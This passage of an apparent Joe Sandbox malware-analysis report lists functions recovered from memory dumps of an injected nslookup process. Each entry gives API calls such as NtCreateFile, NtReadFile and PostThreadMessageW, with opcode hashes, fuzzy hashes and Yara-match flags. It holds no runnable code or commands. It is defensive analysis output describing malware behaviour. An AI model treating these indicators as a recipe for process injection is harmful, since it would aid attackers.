                                  • Opcode Fuzzy Hash: 60e6a619f792cef91ebf149339725841f93ac0b32b861d3016797f44164373a4
                                  • Instruction Fuzzy Hash: 193185B1A402087BDB20DFA0CD89FFB777DDB44708F104958BA08A7180DF70AA848FA4
                                  Function 02A77C10 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02A77D06
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 67a721143b256440e831d564b0d7793f7d5f17e52658368adcef45d5e45fa654
                                  • Instruction ID: 4d3118b6b994ebd22757d15d258e453ee8884c61d767ee4b7cfb983778c7a028
                                  • Opcode Fuzzy Hash: 67a721143b256440e831d564b0d7793f7d5f17e52658368adcef45d5e45fa654
                                  • Instruction Fuzzy Hash: 7A31B6B5A01609AFDB14DF99DD80EEFB7B9AF8C314F108209F918A3340D630A9518FA5
                                  Function 02A77D70 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02A77E4B
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 517a152bc145fa57b29874357ceeac8f32e24082e5f23f503d14a93beed75fde
                                  • Instruction ID: 90cf7810e6e6f7a8e631cf17bfaf77ebb31ac4031f22043e81a438ee3db2f902
                                  • Opcode Fuzzy Hash: 517a152bc145fa57b29874357ceeac8f32e24082e5f23f503d14a93beed75fde
                                  • Instruction Fuzzy Hash: 9C31D7B5A00609AFDB14DF59DC80EEFB7B9AF8C314F10810AFD18A7240DA74A8518FA4
                                  Function 02A77E60 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 6be9dd698a6aa441e71430c4d7cb1b7bce284cac8f05ca31d9d699f9b2c457d0
                                  • Instruction ID: 75c824471c22e0b850e91d396158a5ffbce27987ea5957e92b1d8289db1478ea
                                  • Opcode Fuzzy Hash: 6be9dd698a6aa441e71430c4d7cb1b7bce284cac8f05ca31d9d699f9b2c457d0
                                  • Instruction Fuzzy Hash: 9F016D72A506047FE624EB64DC45FEB77AEDF85710F40840AFA08A7181DAB579018BA9
                                  Function 02A77F00 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02A77F37
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: e6daa042e966176be579df3f9ff239f27a5e42b93ad2f04772bb9893fb58ab0a
                                  • Instruction ID: 5a581616cd673bce202d2bcb487932d8b1ce2b87d2b3a8f4bdc20c72277079eb
                                  • Opcode Fuzzy Hash: e6daa042e966176be579df3f9ff239f27a5e42b93ad2f04772bb9893fb58ab0a
                                  • Instruction Fuzzy Hash: 2AE04F352502547FD110AB59DC01FDB776EDFC5754F404015FA08A7141C6B1790087E4
                                  Function 031F4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 60045edc07c433c298f496e5b627345eef94d6aeccf15d7bf43a51a617abd450
                                  • Instruction ID: 899bbdf2691a071a24707cf3232883afe4a4d53a97e11ad50d48b74636d89915
                                  • Opcode Fuzzy Hash: 60045edc07c433c298f496e5b627345eef94d6aeccf15d7bf43a51a617abd450
                                  • Instruction Fuzzy Hash: D2900231615C04529240B1584884547400597E0301B55C011E1425598D8B148A9A5361
                                  Function 031F4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4dc9a278a4af488dbc05650b08ea8dc58509b758c15e811b114c1522d0ebb35a
                                  • Instruction ID: 69a1228e28934e7aa54c54e2272f596b205465b8d5b1f3bff87dc1a0794c6d35
                                  • Opcode Fuzzy Hash: 4dc9a278a4af488dbc05650b08ea8dc58509b758c15e811b114c1522d0ebb35a
                                  • Instruction Fuzzy Hash: E2900261611904824240B1584804407600597E1301395C115A15555A4D871889999269
                                  Function 031F2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ef18c028e44477943b8ef038b6a349eedf6809fa134e8535a0be0f241dabbbd5
                                  • Instruction ID: 8ac4f8924b7b065486e2d8c37adb12d6859b6f8e289f8c1f445d9416bbfe4b2d
                                  • Opcode Fuzzy Hash: ef18c028e44477943b8ef038b6a349eedf6809fa134e8535a0be0f241dabbbd5
                                  • Instruction Fuzzy Hash: 07900261212804434205B1584414617400A87E0201B55C021E20155D4EC62589D56125
                                  Function 031F2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1d977e925d66447111014fcc9f8555b685e00c2fe34effe1065ef41b737807a6
                                  • Instruction ID: 1205996e56050c0e477bd8e9e090f90142d32fe03078dc37f10a558044aa5a2b
                                  • Opcode Fuzzy Hash: 1d977e925d66447111014fcc9f8555b685e00c2fe34effe1065ef41b737807a6
                                  • Instruction Fuzzy Hash: ED900225221804430205F5580704507004687D5351355C021F2016594DD72189A55121
                                  Function 031F2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f24cf924c002581affa22f39ec304133e934514d270adab9259d9fb4881bcea6
                                  • Instruction ID: 9e274329c98989da147edee9628c3f0cfc223bc2defb0b081bb7b83294c1d7e9
                                  • Opcode Fuzzy Hash: f24cf924c002581affa22f39ec304133e934514d270adab9259d9fb4881bcea6
                                  • Instruction Fuzzy Hash: C6900225231804420245F558060450B044597D6351395C015F24175D4DC72189A95321
                                  Function 031F2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 671696507e7bd2996168ce2b00b89b7f245a30e10eb3ee12f321502c9128a923
                                  • Instruction ID: 3fc4534ff044e9aedf4fbf96e112c9a65975fc3cf86fe0792f842d508626959e
                                  • Opcode Fuzzy Hash: 671696507e7bd2996168ce2b00b89b7f245a30e10eb3ee12f321502c9128a923
                                  • Instruction Fuzzy Hash: C090026135180882D200B1584414B070005C7E1301F55C015E2065598E8719CD966126
                                  Function 031F2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d7603ba4486e992182df9206759f0d5a5d533c8b15b69496600320826ad8f458
                                  • Instruction ID: 5486c9e861bf91f3a053b6bf4247e4e77daa9786c361e4a6f345592f05ad838f
                                  • Opcode Fuzzy Hash: d7603ba4486e992182df9206759f0d5a5d533c8b15b69496600320826ad8f458
                                  • Instruction Fuzzy Hash: D6900221611804824240B16888449074005ABE1211755C121A1999594E865989A95665
                                  Function 031F2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: bba4ac48e185752923f553036be0ad4736352d10ef6dbfddefcc2cac5b6d9c50
                                  • Instruction ID: 6e44196fc6d0f10d571659153b3ef06705d62f6b4abaa0be40cbff8ff41213df
                                  • Opcode Fuzzy Hash: bba4ac48e185752923f553036be0ad4736352d10ef6dbfddefcc2cac5b6d9c50
                                  • Instruction Fuzzy Hash: 24900221221C0482D300B5684C14B07000587D0303F55C115A1155598DCA1589A55521
                                  Function 031F2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: dbffd5ee84d9eabc20f6b07fafbbed4b1da17e3a97d6f277823eb69d0ccd54ea
                                  • Instruction ID: 3d6bdc77a0f690af3643df9d7a470f464cf4afd06b5310ca1b008523c6e9688e
                                  • Opcode Fuzzy Hash: dbffd5ee84d9eabc20f6b07fafbbed4b1da17e3a97d6f277823eb69d0ccd54ea
                                  • Instruction Fuzzy Hash: 4F900261211C0843D240B5584804607000587D0302F55C011A3065599F8B298D956135
                                  Function 031F2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f6ca2dd05ca5a56a47a04f141e468d0acb5fb167b8dca5382a1f0fd73a304a21
                                  • Instruction ID: 45b941778976998ccc48292e8e8d573c624a8117c0a73e2a4f7284792bdd022f
                                  • Opcode Fuzzy Hash: f6ca2dd05ca5a56a47a04f141e468d0acb5fb167b8dca5382a1f0fd73a304a21
                                  • Instruction Fuzzy Hash: 3A90022922380442D280B158540860B000587D1202F95D415A101659CDCA1589AD5321
                                  Function 031F2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8a3f78faebeb5587078117e39c6f7eaf72c1beeeff93c5c340a0c2629c87c048
                                  • Instruction ID: 6072a818d00bbae8dd51514fce9fb3074101fad7dddb6d894dcbdd1098fcc959
                                  • Opcode Fuzzy Hash: 8a3f78faebeb5587078117e39c6f7eaf72c1beeeff93c5c340a0c2629c87c048
                                  • Instruction Fuzzy Hash: F390022131180443D240B15854186074005D7E1301F55D011E1415598DDA15899A5222
                                  Function 031F2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 46c3860f4a83273cf876be3113e614338d5c7081b4f965a733653c4ba1bdd199
                                  • Instruction ID: 2e034f75f899980c9b320d050ce811e683ccec51d3bf48d8f584b92d3d60720c
                                  • Opcode Fuzzy Hash: 46c3860f4a83273cf876be3113e614338d5c7081b4f965a733653c4ba1bdd199
                                  • Instruction Fuzzy Hash: 4E900221252845925645F1584404507400697E0241795C012A2415994D8626999AD621
                                  Function 031F2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 72c17cedcda0dfa58e5bbeceb148739b18a9b618312751ee3851a21109869104
                                  • Instruction ID: 49b081e15eda622a020d7a65b5c9d1fbbe02c39bcae3fb5f34be428e7495349d
                                  • Opcode Fuzzy Hash: 72c17cedcda0dfa58e5bbeceb148739b18a9b618312751ee3851a21109869104
                                  • Instruction Fuzzy Hash: 2E90023121180853D211B1584504707000987D0241F95C412A142559CE97568A96A121
                                  Function 031F2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 54240983b8e9a9c591e0b37c52c4ca70f0ecfde7774e1ac72e6e400b0d4678c8
                                  • Instruction ID: aed61e7a790348b17762cd0d6265efc6d57f84d67fc4ca1fda66981dc1c9ca97
                                  • Opcode Fuzzy Hash: 54240983b8e9a9c591e0b37c52c4ca70f0ecfde7774e1ac72e6e400b0d4678c8
                                  • Instruction Fuzzy Hash: 3C90023121188C42D210B158840474B000587D0301F59C411A542569CE879589D57121
                                  Function 031F2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b21339af8c3e4d4974727096b954b7dd60124cc2373dc098118ce8a211d34c54
                                  • Instruction ID: e5d3d643364c3d839b0c584d4c91f63f67ef6d17d84f197f5731e5f78b40137b
                                  • Opcode Fuzzy Hash: b21339af8c3e4d4974727096b954b7dd60124cc2373dc098118ce8a211d34c54
                                  • Instruction Fuzzy Hash: F690023121180C82D200B1584404B47000587E0301F55C016A1125698E8715C9957521
                                  Function 031F2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 50be0d8e2eb744290a10d8805e803f9eb95c57c489011392b8c5cb940d064785
                                  • Instruction ID: ed9927da47c8bc452244ebfa27da976f44f7a717ee6e8dccd90aee2b08ab99d6
                                  • Opcode Fuzzy Hash: 50be0d8e2eb744290a10d8805e803f9eb95c57c489011392b8c5cb940d064785
                                  • Instruction Fuzzy Hash: B790023121180842D200B5985408647000587E0301F55D011A6025599FC76589D56131
                                  Function 031F35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a5fb3b8d37ac2f7b9ccc9c818325152b5e0c211d0c4cfc4e3a9f34bc13d47e1c
                                  • Instruction ID: 9d0aaa7546dc36b707d8b8f1899d472736ef397c53c65a42fda6086b9265b69a
                                  • Opcode Fuzzy Hash: a5fb3b8d37ac2f7b9ccc9c818325152b5e0c211d0c4cfc4e3a9f34bc13d47e1c
                                  • Instruction Fuzzy Hash: 8190023161590842D200B1584514707100587D0201F65C411A14255ACE87958A9565A2
                                  Function 031F39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: edd7e5638b01746223a521e3b86cf91f4faa2d290fe25695bf01a91c07eaf312
                                  • Instruction ID: 5eed3302a6132c371e2bedbf353485d8fd6b9cca1ef4135dc3bea49af5cd1dfd
                                  • Opcode Fuzzy Hash: edd7e5638b01746223a521e3b86cf91f4faa2d290fe25695bf01a91c07eaf312
                                  • Instruction Fuzzy Hash: 5B90022125585542D250B15C44046174005A7E0201F55C021A18155D8E865589996221
                                  Function 02A609E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(7--93mK-,00000111,00000000,00000000), ref: 02A60A67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 7--93mK-$7--93mK-
                                  • API String ID: 1836367815-3783969520
                                  • Opcode ID: 16f942cfa84dcd9569b7b71f38dd61e2eb33cde37907f254f77ac44f81370d8c
                                  • Instruction ID: 0d36b58ae2278208b718ee5f8ff9579aa86c0a75ace3e7e82c234fad47a1a3c6
                                  • Opcode Fuzzy Hash: 16f942cfa84dcd9569b7b71f38dd61e2eb33cde37907f254f77ac44f81370d8c
                                  • Instruction Fuzzy Hash: F311CEB2D4120C7ADB11ABA48D81EFFBB7DEB40394F008064FA04A7140DA395E068BF1
                                  Function 02A609F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(7--93mK-,00000111,00000000,00000000), ref: 02A60A67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 7--93mK-$7--93mK-
                                  • API String ID: 1836367815-3783969520
                                  • Opcode ID: 5ad0d07882de5479840eda401505350111dc8c2f41be99223ca5d76a412ff8fb
                                  • Instruction ID: cfa33526d617a3ac42932a545c0fd8bbf22c608710b08ac2c327ff8d92be8e67
                                  • Opcode Fuzzy Hash: 5ad0d07882de5479840eda401505350111dc8c2f41be99223ca5d76a412ff8fb
                                  • Instruction Fuzzy Hash: 8001C4B1D4024C7ADB11A7E08D81EFFBB7CDF40294F048065FA0467140DA385E068BB5
                                  Function 02A609DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
